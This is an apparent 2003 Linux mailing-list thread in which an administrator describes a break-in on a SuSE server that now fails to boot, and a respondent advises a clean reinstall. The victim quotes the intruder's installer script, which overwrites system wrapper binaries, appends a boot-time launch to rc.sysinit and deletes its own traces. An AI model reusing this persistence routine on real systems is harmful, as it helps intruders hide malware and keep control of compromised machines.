On Friday 13 June 2003 15:18, Peter Gloor wrote:
Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarely deactivated.
At 2 PM somebody from outside managed to implantinate a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was been over- written (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai.
I'm not sure but it looks like other files have been affected as well (sendmail has gotten a date of tonight and is much larger than the original sendmail).
Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper.
Now, the server will no longer boot. After mounting the file systems (reiserfs) the following messages appears: mounting local filesystems proc on /proctyp proc (rw)
Then the server hangs. How can I get the server up again?
It doesn't matter to me if I have to reinstall all software as long as I don't need to distroy my partitions and, more important, the file system on hda3, since I have a backup of all important config files and all datafiles on hda3.
I would move all the data off the machine and reformat everything by doing a clean install. Only way to be sure (see Hicks' conversation with Ripley, Aliens). Then check the data out and move it back onto the disk once you're confident there's nothing in the data files that could have been planted by the nasties. I don't fancy any of the other 'partial' reinstalls at all, because you'd never be certain ... HTH Fergus
I tried to reinstall from CD, but this doesn't work too (options freely translated from German):
- New Install Will create new partitions and overwirte my HD!?!
- Update existing system Does not boot (same as normal boot from disk)
- Start installes system Does not boot (same as normal boot from disk)
What can I do? Any hints are welcome.
This is how /mihai/inst looks like: --------------------------------------------------------------- #/bin/bash
echo "Start Daemon" sleep 1 ./kill
cp -f mihai /usr/bin/wrapper cp -f mihai /usr/sbin/wrapper
sleep 1 wrapper
chattr -AacdisSu /etc/rc.d/rc.sysinit echo >>/etc/rc.d/rc.sysinit "#Start Wrapper" echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1 rm -rf mihai.tgz rm -rf mihai
echo "Done" ---------------------------------------------------------------
Does anybody know this virus?
Peter
-- Fergus Wilde Chetham's Library Long Millgate Manchester M3 1SB Tel: +44 161 834 7961 Fax: +44 161 839 5797 http://www.chethams.org.uk